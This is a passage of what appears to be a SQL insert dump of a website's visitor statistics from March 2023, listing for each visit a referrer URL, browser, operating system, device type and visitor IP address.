(29832,'2023-03-08','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(29833,'2023-03-08','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','51.255.196.88','000',0,1,0),
(29834,'2023-03-08','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.158.237.126','000',0,2,0),
(29835,'2023-03-08','https://ictbank.ir/blog','Chrome','Windows','111.0.0.0','desktop','Unknown','','109.64.26.167','000',0,17,0),
(29836,'2023-03-09','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(29837,'2023-03-09','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,8,0),
(29838,'2023-03-09','https://45.92.94.221/blog','Chrome','OS X','68.0.0','desktop','Macintosh','','117.187.173.3','000',0,19,0),
(29839,'2023-03-09','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','91.244.13.58','000',0,2,0),
(29840,'2023-03-09','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.79','000',0,2,0),
(29841,'2023-03-09','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,2,0),
(29842,'2023-03-09','https://45.92.94.221/blog','Firefox','Windows','110.0','desktop','Unknown','','24.177.231.230','000',0,2,0),
(29843,'2023-03-09','https://www.google.com/','Chrome','Linux','110.0.0.0','desktop','Unknown','','119.82.80.254','000',0,1,0),
(29844,'2023-03-09','https://ictbank.ir/blog','Chrome','Windows','110.0.0.0','desktop','Unknown','','23.229.113.138','000',0,3,0),
(29845,'2023-03-09','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.50','000',0,6,0),
(29846,'2023-03-09','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(29847,'2023-03-09','https://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','88.99.136.18','000',0,1,0),
(29848,'2023-03-09','http://ICTBANK.IR/blog/impdp-errors-ora-02374-ora-12899','Firefox','Windows','110.0','desktop','Unknown','','34.212.114.15','000',0,2,0),
(29849,'2023-03-09','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.209.46','000',0,1,0),
(29850,'2023-03-09','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.26','000',0,2,0),
(29851,'2023-03-09','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.209.218.51','000',0,1,0),
(29852,'2023-03-09','https://ictbank.ir/blog','Chrome','OS X','39.0.0.0','desktop','Macintosh','','194.87.151.73','000',0,4,0),
(29853,'2023-03-09','https://ictbank.ir/blog/','Edge','Windows','90.0.0.0','desktop','Unknown','','62.204.41.199','000',0,1,0),
(29854,'2023-03-09','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.41','000',0,2,0),
(29855,'2023-03-09','https://ictbank.ir/blog','Opera','Windows','32.0.0.0','desktop','Unknown','','45.170.254.119','000',0,3,0),
(29856,'2023-03-09','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.37','000',0,3,0),
(29857,'2023-03-09','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.35','000',0,2,0),
(29858,'2023-03-09','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.208.223.177','000',0,2,0),
(29859,'2023-03-09','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,1,0),
(29860,'2023-03-09','https://ns2.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.145','000',0,2,0),
(29861,'2023-03-09','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','132.145.9.189','000',0,7,0),
(29862,'2023-03-09','https://ictbank.ir/blog','Opera','Windows','32.0.0.0','desktop','Unknown','','84.17.35.87','000',0,3,0),
(29863,'2023-03-09','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.43','000',0,4,0),
(29864,'2023-03-09','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','162.221.192.26','000',0,2,0),
(29865,'2023-03-09','https://45.92.94.221/blog','Unknown','Linux','Unknown','desktop','Unknown','','54.39.49.180','000',0,2,0),
(29866,'2023-03-09','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.60','000',0,2,0),
(29867,'2023-03-09','https://ictbank.ir/blog','Vivaldi','Linux','5.0.0.0','desktop','Unknown','','173.208.27.81','000',0,2,0),
(29868,'2023-03-09','https://ictbank.ir/blog/','Vivaldi','Linux','5.0.0.0','desktop','Unknown','','172.241.238.158','000',0,5,0),
(29869,'2023-03-09','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(29870,'2023-03-09','https://ictbank.ir/blog','Firefox','Windows','58.0','desktop','Unknown','','46.163.72.193','000',0,7,0),
(29871,'2023-03-09','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.141','000',0,2,0),
(29872,'2023-03-09','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.14.161.248','000',0,1,0),
(29873,'2023-03-09','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.159.152.255','000',0,1,0),
(29874,'2023-03-09','https://ictbank.ir/blog','Chrome','Windows','55.0.0.0','desktop','Unknown','','3.88.213.34','000',0,1,0),
(29875,'2023-03-09','https://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','104.236.65.23','000',0,2,0),
(29876,'2023-03-09','https://45.92.94.221/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.44','000',0,1,0),
(29877,'2023-03-09','https://45.92.94.221/blog/','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.217','000',0,1,0),
(29878,'2023-03-10','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.27','000',0,2,0),
(29879,'2023-03-10','https://ictbank.ir/blog','Firefox','Windows','5.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(29880,'2023-03-10','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(29881,'2023-03-10','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.147','000',0,1,0),
(29882,'2023-03-10','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.138','000',0,4,0),
(29883,'2023-03-10','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.26','000',0,1,0),
(29884,'2023-03-10','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.210','000',0,4,0),
(29885,'2023-03-10','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.141','000',0,2,0),
(29886,'2023-03-10','https://ictbank.ir/blog/','Chrome','Windows','90.0.0.0','desktop','Unknown','','83.21.203.206','000',0,4,0),
(29887,'2023-03-10','https://45.92.94.221/blog','Unknown','Linux','Unknown','desktop','Unknown','','54.39.49.180','000',0,2,0),
(29888,'2023-03-10','https://ictbank.ir/blog','Opera','Windows','32.0.0.0','desktop','Unknown','','37.19.199.220','000',0,3,0),
(29889,'2023-03-10','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.11','000',0,1,0),
(29890,'2023-03-10','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(29891,'2023-03-10','https://ictbank.ir/blog','Chrome','Windows','63.0.0.0','desktop','Unknown','','183.81.12.34','000',0,3,0),
(29892,'2023-03-10','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','139.144.144.163','000',0,1,0),
(29893,'2023-03-10','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.134','000',0,2,0),
(29894,'2023-03-10','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','109.74.203.254','000',0,2,0),
(29895,'2023-03-10','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.140','000',0,4,0),
(29896,'2023-03-10','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','178.79.181.7','000',0,1,0),
(29897,'2023-03-10','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.191.158.51','000',0,1,0),
(29898,'2023-03-10','https://ictbank.ir/blog/','Chrome','Windows','90.0.0.0','desktop','Unknown','','136.169.243.74','000',0,4,0),
(29899,'2023-03-10','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','172.105.132.40','000',0,2,0),
(29900,'2023-03-10','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,2,0),
(29901,'2023-03-10','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.6','000',0,2,0),
(29902,'2023-03-10','https://ictbank.ir/blog','Firefox','Ubuntu','107.0','desktop','Unknown','','139.91.70.45','000',0,2,0),
(29903,'2023-03-10','https://ictbank.ir/blog','Firefox','OS X','68.0','desktop','Macintosh','','51.254.199.11','000',0,2,0),
(29904,'2023-03-10','http://45.92.94.221:80/','Chrome','Windows','99.0.0.0','desktop','Unknown','','178.255.46.64','000',0,1,0),
(29905,'2023-03-10','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','185.11.61.237','000',0,2,0),
(29906,'2023-03-10','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','109.74.203.143','000',0,1,0),
(29907,'2023-03-10','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(29908,'2023-03-10','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','178.79.181.41','000',0,2,0),
(29909,'2023-03-10','https://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','185.181.60.39','000',0,2,0),
(29910,'2023-03-10','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.41.87.40','000',0,1,0),
(29911,'2023-03-10','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(29912,'2023-03-10','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.18','000',0,2,0),
(29913,'2023-03-10','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(29914,'2023-03-10','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.251.102.74','000',0,2,0),
(29915,'2023-03-10','https://ictbank.ir/blog','Chrome','Windows','69.0.0.0','desktop','Unknown','','103.86.47.5','000',0,3,0),
(29916,'2023-03-10','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,1,0),
(29917,'2023-03-10','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','207.244.241.132','000',0,2,0),
(29918,'2023-03-10','https://ictbank.ir/blog','Safari','iOS','16.0','mobile:smart','iPhone','','69.171.251.21','000',0,1,0),
(29919,'2023-03-10','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','192.185.82.131','000',0,1,0),
(29920,'2023-03-10','https://ictbank.ir/blog','Chrome','Windows','80.0.0.0','desktop','Unknown','','198.244.174.158','000',0,1,0),
(29921,'2023-03-10','https://ictbank.ir/blog','Chrome','Windows','80.0.0.0','desktop','Unknown','','198.244.174.156','000',0,1,0),
(29922,'2023-03-10','https://ictbank.ir/blog','Chrome','Windows','80.0.0.0','desktop','Unknown','','198.244.174.155','000',0,1,0),
(29923,'2023-03-10','https://ictbank.ir/blog','Chrome','Windows','80.0.0.0','desktop','Unknown','','198.244.174.154','000',0,1,0),
(29924,'2023-03-10','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','65.109.12.247','000',0,1,0),
(29925,'2023-03-10','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','152.32.221.190','000',0,3,0),
(29926,'2023-03-10','https://ictbank.ir/blog','Chrome','Windows','57.0.0.0','desktop','Unknown','','173.231.229.54','000',0,3,0),
(29927,'2023-03-10','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.73','000',0,1,0),
(29928,'2023-03-10','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','161.35.113.64','000',0,17,0),
(29929,'2023-03-10','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.141.34','000',0,2,0),
(29930,'2023-03-11','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','161.35.113.64','000',0,19,0),
(29931,'2023-03-11','http://ictbank.ir/','Vivo Browser','Android','8.0.0.0','mobile:smart','Unknown','','36.255.223.74','000',0,2,0),
(29932,'2023-03-11','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.41','000',0,4,0),
(29933,'2023-03-11','https://ictbank.ir/blog','Chrome','Android','91.0.0.0','mobile:smart','Galaxy Note 9','','89.46.108.194','000',0,3,0),
(29934,'2023-03-11','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,1,0),
(29935,'2023-03-11','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.39','000',0,8,0),
(29936,'2023-03-11','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','185.197.195.173','000',0,1,0),
(29937,'2023-03-11','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.8','000',0,2,0),
(29938,'2023-03-11','https://ictbank.ir/blog','Chrome','Linux','105.0.0.0','desktop','Unknown','','199.244.88.224','000',0,1,0),
(29939,'2023-03-11','https://ictbank.ir/blog','Chrome','Linux','105.0.0.0','desktop','Unknown','','199.244.88.230','000',0,1,0),
(29940,'2023-03-11','https://ictbank.ir/blog','Chrome','Windows','80.0.0.0','desktop','Unknown','','51.89.221.222','000',0,1,0),
(29941,'2023-03-11','https://ictbank.ir/blog','Chrome','Windows','80.0.0.0','desktop','Unknown','','51.77.103.250','000',0,1,0),
(29942,'2023-03-11','https://ictbank.ir/blog','Chrome','Windows','80.0.0.0','desktop','Unknown','','51.77.103.249','000',0,1,0),
(29943,'2023-03-11','https://ictbank.ir/blog','Chrome','Windows','80.0.0.0','desktop','Unknown','','51.77.103.248','000',0,1,0),
(29944,'2023-03-11','https://ictbank.ir/blog','Firefox','Windows','117.0','desktop','Unknown','','195.146.37.212','000',0,1,0),
(29945,'2023-03-11','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','103.130.218.13','000',0,1,0),
(29946,'2023-03-11','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','87.0.0.0','desktop','Unknown','','185.119.81.109','000',0,4,0),
(29947,'2023-03-11','https://ictbank.ir/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','223.240.99.104','000',0,1,0),
(29948,'2023-03-11','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(29949,'2023-03-11','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.32','000',0,4,0),
(29950,'2023-03-11','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.27','000',0,2,0),
(29951,'2023-03-11','https://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(29952,'2023-03-11','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.35','000',0,5,0),
(29953,'2023-03-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','20.67.243.220','000',0,1,0),
(29954,'2023-03-11','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,2,0),
(29955,'2023-03-11','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.108','000',0,2,0),
(29956,'2023-03-11','https://ictbank.ir/blog','Firefox','Windows','43.0','desktop','Unknown','','171.244.15.77','000',0,3,0),
(29957,'2023-03-11','https://ictbank.ir/blog','Chrome','Windows','69.0.0.0','desktop','Unknown','','154.61.75.18','000',0,3,0),
(29958,'2023-03-11','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','139.162.218.158','000',0,1,0),
(29959,'2023-03-11','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','184.168.125.241','000',0,1,0),
(29960,'2023-03-11','https://ictbank.ir/blog','Chrome','iOS','91.0.0.0','media','iPod touch','','184.168.115.25','000',0,3,0),
(29961,'2023-03-11','https://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','151.248.1.125','000',0,1,0),
(29962,'2023-03-11','https://ictbank.ir/blog','Opera','Windows','32.0.0.0','desktop','Unknown','','115.200.178.157','000',0,1,0),
(29963,'2023-03-11','https://ictbank.ir/blog','Opera','Windows','32.0.0.0','desktop','Unknown','','200.2.121.130','000',0,1,0),
(29964,'2023-03-11','https://ictbank.ir/blog','Opera','Windows','32.0.0.0','desktop','Unknown','','122.187.230.35','000',0,1,0),
(29965,'2023-03-11','https://ictbank.ir/blog/','Chrome','Windows','90.0.0.0','desktop','Unknown','','79.139.183.195','000',0,4,0),
(29966,'2023-03-11','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.221.26.241','000',0,1,0),
(29967,'2023-03-11','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(29968,'2023-03-11','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','109.237.26.195','000',0,2,0),
(29969,'2023-03-11','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','91.244.13.58','000',0,4,0),
(29970,'2023-03-11','https://ictbank.ir/blog','Firefox','Windows','73.0','desktop','Unknown','','185.220.34.113','000',0,1,0),
(29971,'2023-03-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','198.54.114.76','000',0,1,0),
(29972,'2023-03-11','https://ictbank.ir/blog','Chrome','Windows','80.0.0.0','desktop','Unknown','','139.59.29.179','000',0,3,0),
(29973,'2023-03-11','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','129.226.34.179','000',0,1,0),
(29974,'2023-03-11','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.7.133.62','000',0,1,0),
(29975,'2023-03-11','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.88.88.99','000',0,1,0),
(29976,'2023-03-11','https://ictbank.ir/blog','Opera','Windows','32.0.0.0','desktop','Unknown','','201.166.225.176','000',0,1,0),
(29977,'2023-03-11','https://ictbank.ir/blog','Opera','Windows','32.0.0.0','desktop','Unknown','','103.143.102.188','000',0,1,0),
(29978,'2023-03-11','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(29979,'2023-03-11','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.168.54.224','000',0,1,0),
(29980,'2023-03-11','https://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','89.252.140.105','000',0,3,0),
(29981,'2023-03-11','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','44.212.47.163','000',0,1,0),
(29982,'2023-03-11','https://design-arena.ir/blog','Firefox','OS X','21.0','desktop','Macintosh','','45.76.43.3','000',0,4,0),
(29983,'2023-03-12','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(29984,'2023-03-12','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.31','000',0,8,0),
(29985,'2023-03-12','https://ictbank.ir/blog','Chrome','Windows','16.0.0.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(29986,'2023-03-12','https://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.126','000',0,4,0),
(29987,'2023-03-12','http://www.facebook.net/','Firefox','Windows','72.0','desktop','Unknown','','147.78.47.230','000',0,2,0),
(29988,'2023-03-12','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.47','000',0,1,0),
(29989,'2023-03-12','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,4,0),
(29990,'2023-03-12','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.41','000',0,2,0),
(29991,'2023-03-12','https://ictbank.ir/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','223.247.178.167','000',0,1,0),
(29992,'2023-03-12','https://ictbank.ir/blog','Firefox','OS X','80.0','desktop','Macintosh','','71.6.158.166','000',0,3,0),
(29993,'2023-03-12','https://ictbank.ir/hooman/admin/','Chrome','Windows','110.0.0.0','desktop','Unknown','','5.237.167.160','000',0,207,0),
(29994,'2023-03-12','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.32','000',0,4,0),
(29995,'2023-03-12','https://ictbank.ir/hooman/admin/','Chrome','Windows','110.0.0.0','desktop','Unknown','','5.160.95.179','000',0,99,0),
(29996,'2023-03-12','https://45.92.94.221/blog','Unknown','Linux','Unknown','desktop','Unknown','','54.39.49.180','000',0,1,0),
(29997,'2023-03-12','https://ictbank.ir/blog','Chrome','OS X','39.0.0.0','desktop','Macintosh','','80.76.51.29','000',0,4,0),
(29998,'2023-03-12','https://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','213.32.122.82','000',0,1,0),
(29999,'2023-03-12','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.209.162','000',0,2,0),
(30000,'2023-03-12','https://ictbank.ir/blog','Chrome','OS X','110.0.0.0','desktop','Macintosh','','5.161.194.240','000',0,6,0),
(30001,'2023-03-12','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.92.127.1','000',0,1,0),
(30002,'2023-03-12','https://ictbank.ir/blog','Chrome','Windows','110.0.0.0','desktop','Unknown','','23.229.104.2','000',0,1,0),
(30003,'2023-03-12','https://ictbank.ir/blog','Firefox','OS X','80.0','desktop','Macintosh','','185.142.236.40','000',0,1,0),
(30004,'2023-03-12','https://ictbank.ir/hooman/admin/index.php','Chrome','Windows','110.0.0.0','desktop','Unknown','','213.52.130.116','000',0,8,0),
(30005,'2023-03-12','https://design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.73','000',0,2,0),
(30006,'2023-03-12','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(30007,'2023-03-12','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(30008,'2023-03-12','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,1,0),
(30009,'2023-03-12','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.48','000',0,3,0),
(30010,'2023-03-12','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,2,0),
(30011,'2023-03-12','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','4.236.139.145','000',0,53,0),
(30012,'2023-03-12','https://ictbank.ir/blog','Firefox','Windows','104.0','desktop','Unknown','','83.244.19.43','000',0,2,0),
(30013,'2023-03-12','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','54.90.245.92','000',0,21,0),
(30014,'2023-03-12','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.216.127.251','000',0,2,0),
(30015,'2023-03-12','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','48.0.0.0','desktop','Unknown','','185.119.81.109','000',0,6,0),
(30016,'2023-03-12','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.40','000',0,1,0),
(30017,'2023-03-12','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.130.149.169','000',0,1,0),
(30018,'2023-03-12','https://l.instagram.com/','Instagram','Android','260.0.0.0.0','mobile:smart','Redmi Note 9T','','185.107.56.28','000',0,1,0),
(30019,'2023-03-12','https://l.instagram.com/','Instagram','iOS','273.0.0.0.0','mobile:smart','iPhone 7','','111.90.148.37','000',0,1,0),
(30020,'2023-03-13','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','54.90.245.92','000',0,18,0),
(30021,'2023-03-13','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','4.236.139.145','000',0,33,0),
(30022,'2023-03-13','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(30023,'2023-03-13','https://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(30024,'2023-03-13','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(30025,'2023-03-13','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.46','000',0,2,0),
(30026,'2023-03-13','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','132.145.78.163','000',0,7,0),
(30027,'2023-03-13','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.43','000',0,3,0),
(30028,'2023-03-13','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.136.78','000',0,1,0),
(30029,'2023-03-13','https://ictbank.ir/hooman/admin/index.php','Chrome','Windows','110.0.0.0','desktop','Unknown','','5.160.95.179','000',0,3,0),
(30030,'2023-03-13','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.28','000',0,11,0),
(30031,'2023-03-13','https://ictbank.ir/hooman/admin/','Chrome','Windows','110.0.0.0','desktop','Unknown','','5.237.166.168','000',0,155,0),
(30032,'2023-03-13','https://ictbank.ir/blog','Chrome','Linux','12.0.0.0','desktop','Unknown','','208.80.194.121','000',0,4,0),
(30033,'2023-03-13','https://ns1.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.76','000',0,2,0),
(30034,'2023-03-13','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.36.101.2','000',0,1,0),
(30035,'2023-03-13','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','185.142.236.40','000',0,2,0),
(30036,'2023-03-13','https://45.92.94.221/blog','Chrome','Linux','86.0.0','desktop','Unknown','','118.123.105.90','000',0,8,0),
(30037,'2023-03-13','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','20.70.209.118','000',0,1,0),
(30038,'2023-03-13','https://ictbank.ir/blog','Chrome','Windows','111.0.0.0','desktop','Unknown','','5.127.238.213','000',0,7,0),
(30039,'2023-03-13','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.30','000',0,1,0),
(30040,'2023-03-13','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','45.40.57.102','000',0,3,0),
(30041,'2023-03-13','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','63.0.0.0','desktop','Unknown','','185.119.81.109','000',0,2,0),
(30042,'2023-03-13','https://ictbank.ir/blog','Chrome','Windows','76.0.0.0','desktop','Unknown','','35.162.192.136','000',0,1,0),
(30043,'2023-03-13','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(30044,'2023-03-13','https://ictbank.ir/blog','Chrome','Windows','68.0.0.0','desktop','Unknown','','58.110.251.170','000',0,2,0),
(30045,'2023-03-13','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.7.133.62','000',0,1,0),
(30046,'2023-03-13','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','176.9.47.58','000',0,1,0),
(30047,'2023-03-13','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.38','000',0,2,0),
(30048,'2023-03-13','https://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','5.188.62.21','000',0,3,0),
(30049,'2023-03-13','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.45','000',0,4,0),
(30050,'2023-03-13','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.141.42','000',0,1,0),
